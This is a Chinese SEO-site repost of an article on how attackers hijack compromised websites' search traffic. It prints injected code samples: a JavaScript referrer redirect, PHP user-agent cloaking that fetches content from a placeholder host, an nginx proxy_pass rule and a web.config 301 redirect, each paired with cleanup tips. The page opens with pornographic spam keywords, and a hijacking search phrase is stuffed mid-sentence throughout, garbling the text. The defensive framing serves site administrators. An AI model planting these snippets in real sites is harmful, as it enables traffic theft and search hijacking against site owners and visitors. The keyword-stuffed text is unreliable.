2020AV天堂网,午夜色色视频,美女黄片免费观看,欧美黄色电影网站,亚洲人在线

新聞資訊

新聞資訊

百度劫持關(guān)鍵詞排名首頁代碼(百度搜索劫持跳轉(zhuǎn))

時(shí)間:2023-11-21 信途科技新聞資訊

攻擊者在入侵網(wǎng)站后百度劫持關(guān)鍵詞排名首頁代碼,常常會(huì)通過惡意劫持流量來獲取收益百度劫持關(guān)鍵詞排名首頁代碼,從而實(shí)現(xiàn)流量變現(xiàn)。有一些黑帽劫持的手法堪稱防不勝防,正常的訪問行為很難發(fā)現(xiàn)異常。今天給大家分享一下常見的網(wǎng)站劫持手法和排查思路。

我們可以按照基于不同隱藏目的的常見劫持手法,來做一個(gè)簡(jiǎn)單的分類百度劫持關(guān)鍵詞排名首頁代碼

1、將爬蟲與用戶正常訪問分開,實(shí)現(xiàn)搜索引擎快照劫持2、將移動(dòng)端與PC端的訪問分開,實(shí)現(xiàn)移動(dòng)端的流量劫持3、根據(jù)用戶訪問來源進(jìn)行判斷,實(shí)現(xiàn)特定來源網(wǎng)站劫持4、如果獲取管理員的真實(shí)IP地址,實(shí)現(xiàn)特定區(qū)域的流量劫持5、按照訪問路徑/關(guān)鍵詞/時(shí)間段設(shè)置,實(shí)現(xiàn)特定路徑/關(guān)鍵詞/時(shí)間段的流量劫持

基于以上,實(shí)現(xiàn)的方式有很多種,比如客戶端js劫持、服務(wù)端代碼劫持、301重定向、惡意反向代理、IIS模塊劫持等。

01、客戶端js劫持

在網(wǎng)頁中插入js腳本,通過js進(jìn)行url跳轉(zhuǎn),一般情況下,會(huì)通過js混淆加密來增加識(shí)別難度。

如下:通過js劫持從搜索引擎中來的流量。

<script>var s=document.referrer; if(s.indexOf("baidu")>0||s.indexOf("soso")>0||s.indexOf("google")>0||s.indexOf("yahoo")>0||s.indexOf("sogou")>0||s.indexOf("youdao")>0||s.indexOf("bing")>0){self.location='http://xintu.xxxx.com'; }</script>

排查思路:查看網(wǎng)頁源代碼或者抓包分析http流量,找到源代碼中插入的js代碼,刪除js代碼后恢復(fù)。

02、服務(wù)端代碼劫持

網(wǎng)站源碼被篡改,在首頁或配置文件中引入惡意代碼。

如下:通過判斷User-agent與Referer,進(jìn)行快照劫持。

<?phperror_reporting(0);//判斷是否為百度蜘蛛,然后進(jìn)行內(nèi)容劫持if(stripos($_SERVER["HTTP_USER_AGENT"],"baidu")>-1){$file = file_get_contents('http://xintu.xxxx.com');echo $file;exit;}//判斷是否來自百度搜索,然后進(jìn)行url跳轉(zhuǎn)if(stristr ($_SERVER['HTTP_REFERER'],"baidu.com")) {Header("Location: http://xintu.xxxx.com/");//指定跳轉(zhuǎn)exit; }?>

排查思路:查看網(wǎng)站首頁引入了哪些文件,依次訪問相關(guān)的文件源碼,確認(rèn)可疑的代碼,去除包含文件后恢復(fù)。備份網(wǎng)站源碼及文件完整性驗(yàn)證非常重要,可以幫助我們?cè)谏先f行的代碼中快速找到惡意代碼。

03、nginx反向代理劫持

以前遇到過一個(gè)網(wǎng)站做了網(wǎng)頁防篡改,無法通過修改網(wǎng)站源碼劫持,攻擊者通過修改nginx的配置文件,通過正則匹配url鏈接,配置proxy_pass代理轉(zhuǎn)發(fā)實(shí)現(xiàn)url劫持。

location ~ /[0-9a-z]+sc { proxy_pass https://xintu.xxxx.com/;}

排查思路:總結(jié)url劫持規(guī)律,中間件配置文件也是需要關(guān)注的位置。

04、利用301重定向劫持

通過HTTP重定向?qū)崿F(xiàn)301劫持。

<httpRedirect enabled="true" destination="http://xintu.xxxx.com/1.php" childOnly="true" httpResponseStatus="Permanent" />

排查思路:可以檢查網(wǎng)站根目錄下的配置文件web.config,確認(rèn)是否有相關(guān)設(shè)置。

05、IIS惡意模塊劫持

這種手法相對(duì)比較隱蔽,網(wǎng)站目錄中查不到webshell和掛馬頁面,但使用特定的路徑、Referer或者UA訪問,頁面會(huì)加載暗鏈。

排查思路:排查加載的異常dll文件,如沒有簽名、創(chuàng)建時(shí)間不匹配需重點(diǎn)關(guān)注。可使用火絨劍或Process Monitor等工具協(xié)助排查。

掃描二維碼推送至手機(jī)訪問。

版權(quán)聲明:本文由信途科技轉(zhuǎn)載于網(wǎng)絡(luò),如有侵權(quán)聯(lián)系站長(zhǎng)刪除。

轉(zhuǎn)載請(qǐng)注明出處http://m.quickersubmitter.com/xintu/53336.html

相關(guān)文章

搜索關(guān)鍵詞排名代理(搜索關(guān)鍵詞排名)

重搜索引擎 、輕B2B模式運(yùn)營@運(yùn)營貓工具箱輕松做推廣,快樂接訂單! 上海百度愛采購的本質(zhì)是讓用戶能在百度平臺(tái)直接搜索到自己想要的商品,愛采購是為用戶采購商品而搭建起來的垂直搜索引擎。愛采購自身是沒有...

新品如何關(guān)鍵詞排名(淘寶如何看關(guān)鍵詞排名)

長(zhǎng)尾關(guān)鍵詞是什么?關(guān)鍵詞排名應(yīng)該怎么競(jìng)爭(zhēng),WordPress,zblog,各種CMS的關(guān)鍵詞優(yōu)化是一樣的嗎。以上這些問題是我們很多小白站長(zhǎng)剛接觸網(wǎng)站時(shí)常想的問題。對(duì)于這些問題答案是肯定的,關(guān)鍵詞是我們...

石嘴山網(wǎng)站優(yōu)化公司(石嘴山微信公眾號(hào)公司)

可以獲取更多石嘴山整站優(yōu)化寧夏網(wǎng)絡(luò)推廣相關(guān)供求信息,請(qǐng)查閱寧夏利福光網(wǎng)絡(luò)科技有限公司網(wǎng)站供應(yīng)商機(jī)欄目。推來客網(wǎng)絡(luò)專注于 石嘴山網(wǎng)站優(yōu)化石嘴山網(wǎng)站推廣,關(guān)鍵詞首頁排名等服務(wù)是石嘴山 一家專業(yè)的網(wǎng)站建設(shè)和...

簡(jiǎn)述飯店網(wǎng)絡(luò)營銷的特點(diǎn),網(wǎng)絡(luò)視頻營銷具有什么特點(diǎn)

然后講解飯店網(wǎng)站的建設(shè),飯店業(yè)網(wǎng)絡(luò)營銷, 飯店業(yè)電子商務(wù)應(yīng)用,最后介紹飯店網(wǎng)絡(luò)預(yù)訂 系統(tǒng)的應(yīng)用和作用 了解飯店網(wǎng)絡(luò)預(yù)訂系統(tǒng)的發(fā)展趨勢(shì)71 的特點(diǎn)定位和要求,把其設(shè)計(jì)成一種企 業(yè)傳遞信息,開展網(wǎng)絡(luò)營銷動(dòng)...

便宜的seo網(wǎng)站優(yōu)化排名的簡(jiǎn)單介紹

目前shopee在主流平臺(tái)的火熱程度,大家應(yīng)該是有目共睹的,我從前年關(guān)注它的成長(zhǎng),可謂是一步一步看著它走到了目前用戶活躍度前五的排名。這個(gè)跟他本身的努力分不開!為什么新賣家更多愿意選擇shopee?1...

關(guān)于免費(fèi)建站系統(tǒng)怎么樣的信息

而通過自助建站系統(tǒng)的話,就會(huì)避免這些問題,地瓜智能自助建站CMS系統(tǒng)強(qiáng)大的功能,以及其完美的靈活性輕松解決了這些問題。易優(yōu)cmseyoucms是一款專注于企業(yè)網(wǎng)站建設(shè)的企業(yè)建站系統(tǒng),系統(tǒng)以免費(fèi)安全易用...

現(xiàn)在,非常期待與您的又一次邂逅

我們努力讓每一次邂逅總能超越期待

  • 效果付費(fèi)
    效果付費(fèi)

    先出效果再付費(fèi)

  • 極速交付
    極速交付

    響應(yīng)速度快,有效節(jié)省客戶時(shí)間

  • 1對(duì)1服務(wù)
    1對(duì)1服務(wù)

    專屬客服對(duì)接咨詢

  • 持續(xù)更新
    持續(xù)更新

    不斷升級(jí)維護(hù),更好服務(wù)用戶